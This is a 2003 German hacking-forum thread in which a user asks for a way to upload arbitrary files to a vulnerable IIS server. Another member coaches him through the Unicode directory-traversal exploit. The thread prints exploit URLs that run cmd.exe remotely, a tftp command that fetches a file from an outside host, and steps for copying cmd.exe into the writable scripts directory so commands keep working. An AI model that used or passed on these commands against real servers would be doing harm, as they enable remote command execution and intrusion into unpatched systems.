Hackerboard Wiki HaboBlog
Hackerboard bei Facebook Hackerboard bei Google+ Hackerboard bei Twitter

[HaBo]

 
(In)security allgemein Sicherheit, Anonymität im Netz. Schutz und Maßnahmen. Prävention und Konzepte. Sicherheitsarchitekturen allgemein und auf der Netzwerkebene.

Upload-(Script) für einen verbuggten IIS?

Diskussion: Upload-(Script) für einen verbuggten IIS? im Forum (In)security allgemein, in der Kategorie Security Area; Anzeige Hi Leutz, ich bräuchte ein Upload Script, habe davon jedenfalls wasgehört, mit dem ich beliebige Dateien auf einen verbuggten ...

Antwort
Alt 04.01.03, 14:27   #1 (permalink)
 
Registriert seit: 04.01.03
seppl Leistung: Facit NTK
Likes: 0
Standard Upload-(Script) für einen verbuggten IIS?

Anzeige

Hi Leutz,

ich bräuchte ein Upload Script, habe davon jedenfalls wasgehört, mit dem ich beliebige Dateien auf einen verbuggten IIS schieben kann. Falls es kein Script dafür gibt, bitte ich um ein paar cmd.exe Befehle.
mfg und vielen Dank im Voraus

cu

seppl ist offline   Mit Zitat antworten
Alt 04.01.03, 19:16   #2 (permalink)
Rushjo
Guest
 
Likes:
Standard

Hi seppl,

sage mal, hast Du durch Zufall mal www.google.de
mit den Suchbegriffen: IIS + bug + tutorial + Unicode
gesucht?

Dürfte helfen!

MfG Rushjo
  Mit Zitat antworten
   
HaBOT
 
- Anzeige -

Werbung ist gerade online    
Alt 04.01.03, 22:32   #3 (permalink)
Themenstarter
 
Registriert seit: 04.01.03
seppl Leistung: Facit NTK
Likes: 0
Standard

jops hatte ich schon, jedoch hatte ich immer Probleme damit, dass er die nicht überträgt mit diesem befehl:
Code:
*****/winnt/system32/cmd.exe?/c+tftp+-i+123.456.12.45+get+c:\ftp\x.jpg+c:\x.jpg
123.456.12.45 ist hierbei meine IP! Und ich mache auch nichts illegales, ist ist ein testserver.
seppl ist offline   Mit Zitat antworten
Alt 05.01.03, 00:09   #4 (permalink)
Themenstarter
 
Registriert seit: 04.01.03
seppl Leistung: Facit NTK
Likes: 0
Standard

Wenn ich eine Datei übertragen will, dann meldet mir TFTPD32: recv returns 10054, Unexpected request 5 from peer. error 10054 in system call recv Eine vorhandene Verbindung wurde vom Remotehost geschlossen. Returning EBADOP to Peer. So, also hier ist wirklich Schluss bei mir Jetzt weiss ich auch nichts mehr. Aber ihr wisst da sicherlich mehr!

cu
seppl ist offline   Mit Zitat antworten
Alt 05.01.03, 00:16   #5 (permalink)
Rushjo
Guest
 
Likes:
Standard

hi seppl,

schau Dir einfach mal die Hilfe zu tftp.exe an!
(unter Dos c:\tftp /? )

Da steht:

TFTP [-i] HOST [GET | PUT] QUELLE [ZIEL]

Und sowie ich das bei Dir gesehen habe, fehlt dort
die Ziel angabe!

MfG Rushjo
  Mit Zitat antworten
Alt 05.01.03, 00:21   #6 (permalink)
Themenstarter
 
Registriert seit: 04.01.03
seppl Leistung: Facit NTK
Likes: 0
Standard

hi,
Code:
*****/winnt/system32/cmd.exe?/c+tftp+-i+123.456.12.45+get+c:\ftp\x.jpg+c:\x.jpg
Code:
*****/winnt/system32/cmd.exe?/c+tftp+-i+<HOST>+get+<QUELLE>+<ZIEL>
also das ziel fehlt nicht.
aber auf dem testserver läuft eine firewall, kann es also sein, das ich deswegen so einen error message von ftpd32 bekomme: Eine vorhandene Verbindung wurde vom Remotehost geschlossen. ???
seppl ist offline   Mit Zitat antworten
Alt 05.01.03, 00:33   #7 (permalink)
Rushjo
Guest
 
Likes:
Standard

Also, ich denke, es liegt am RemoteHost und an der
Firewall! Aber paste mal bitte die genaue Antwort!

MfG Rushjo
  Mit Zitat antworten
Alt 05.01.03, 12:11   #8 (permalink)
Themenstarter
 
Registriert seit: 04.01.03
seppl Leistung: Facit NTK
Likes: 0
Standard

Genaue Fehlermeldung:
Zitat:
recv returns 10054, Unexpected request 5 from peer. error 10054 in system call recv Eine vorhandene Verbindung wurde vom Remotehost geschlossen. Returning EBADOP to Peer.
seppl ist offline   Mit Zitat antworten
Alt 05.01.03, 15:46   #9 (permalink)
Rushjo
Guest
 
Likes:
Standard

Hi seppl,

also das Problem ist ein ganz Anderes. Du arbeitest
mit der

Code:
.../winnt/system32/cmd.exe?/c+....
und dies ist nicht möglich aufgrund der
Sicherheitsrichtlinien von Windows.
Du mußt vorher noch eine Kopie der cmd.exe erstellen
und mit der arbeitest du dann weiter! --> reicht das als
Tip/Hinweis?!

MfG Rushjo
  Mit Zitat antworten
Alt 05.01.03, 16:37   #10 (permalink)
Themenstarter
 
Registriert seit: 04.01.03
seppl Leistung: Facit NTK
Likes: 0
Standard

Hi,

so ich habe nun die Datei kopiert und nochmals ausgeführt, aber es kommt immer wieder die gleiche Fehlermeldung bei meinem TFTP Server.
seppl ist offline   Mit Zitat antworten
Alt 05.01.03, 19:24   #11 (permalink)
Rushjo
Guest
 
Likes:
Standard

Hi seppl,

Du mußt dann auch mit der Kopie der cmd.exe
weiterarbeiten.

Code:
.../scripts/..../inetpub/scripts/kopie_cmd.exe?/c+.....
Dann sollte es funktionieren!

MfG Rushjo

P.S. Mal einen Tip zur Sicherung DEINES gebuggten
IIS. Lies mal dies hier und vorallem dürfte Dir
dies Tool hier helfen beim Sichern Deines IIS!
  Mit Zitat antworten
Alt 05.01.03, 19:52   #12 (permalink)
Themenstarter
 
Registriert seit: 04.01.03
seppl Leistung: Facit NTK
Likes: 0
Standard

Ja ich habe mit der kopierten cmd.exe weitergearbeitet. Oder spielt es ne Rolle, ob die cmd.exe in dem Ordner "Scripts" liegt?


cu
seppl ist offline   Mit Zitat antworten
Alt 05.01.03, 20:16   #13 (permalink)
Rushjo
Guest
 
Likes:
Standard

Hi seppl,

janein. Sie sollte in einem "Nicht-schreibgeschützten"
Verzeichnis liegen! Normalerweise wird sie immer/
meistens in c:\inetpub\scripts\ gelegt! In das Verzeich-
nis hat der IIS standardmässig Schreib-/Lese-/Lösch-
rechte! Dort sieht man auch, ob vorher schon
"jemand" auf dem Server war/ist!

MfG Rushjo
  Mit Zitat antworten
Alt 08.01.03, 18:17   #14 (permalink)
Themenstarter
 
Registriert seit: 04.01.03
seppl Leistung: Facit NTK
Likes: 0
Standard

jops. habe es wieder so gemacht, wo du rushjo es gesagt hast, aber es kommt immer wieder der gleiche fehler, den ich schon gepastet hatte.
seppl ist offline   Mit Zitat antworten
Alt 10.01.03, 01:09   #15 (permalink)
Rushjo
Guest
 
Likes:
Standard

Hi seppl,

so ich antworte mal ein bißchen detaillierter. Mit den
folgenden Befehlen sollte es eigentlich funktionieren:

Code:
http://IP/scripts/Unicode_Bug/winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\cmdneu.exe
* zuerst kopierst Du erstmal die cmd.exe ins Ver-
zeichnis c:\inetpub\scripts\

Code:
http://IP/scripts/Unicode_Bug/inetpub/scripts/cmdneu.exe?/c+dir+c:\inetpub\scripts\
* mit der Kopie der cmd.exe (=cmdneu.exe) arbeitest
Du dann weiter. Ich habe mir hier erstmal nur den
Inhalt des Verzeichnisses anzeigen lassen!

Wichtig ist, das Du mit der Kopie weiterarbeitest und
nicht mit dem Original der cmd.exe, weil die Rechte-
vergabe dies bei Windows nicht zu läßt.

MfG Rushjo

P.S. Wenn das nicht hilft, einfach hier weiterfragen.
  Mit Zitat antworten
Antwort
   
- Anzeige -

Werbung ist gerade online    

[HaBo] » Security Area » (In)security allgemein » Upload-(Script) für einen verbuggten IIS?
Themen-Optionen
Ansicht

Forumregeln
Es ist Ihnen nicht erlaubt, neue Themen zu verfassen.
Es ist Ihnen nicht erlaubt, auf Beiträge zu antworten.
Es ist Ihnen nicht erlaubt, Anhänge hochzuladen.
Es ist Ihnen nicht erlaubt, Ihre Beiträge zu bearbeiten.

BB-Code ist an.
Smileys sind an.
[IMG] Code ist an.
HTML-Code ist aus.
Trackbacks sind aus
Pingbacks sind aus
Refbacks sind aus


Ähnliche Themen
Thema Autor Forum Antworten Letzter Beitrag
Schönste Upload Script? theend (Web-) Design und webbasierte Sprachen 11 05.03.09 15:35
Problem bei Upload-Script Corex (Web-) Design und webbasierte Sprachen 4 26.07.08 10:38
mysql upload script Herbder Code Kitchen 6 19.12.04 14:30
PHP-Upload-Script-Problem Voodoo (Web-) Design und webbasierte Sprachen 6 02.11.04 18:09
Perl Upload Script Zwirni Code Kitchen 0 16.08.04 11:19


1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61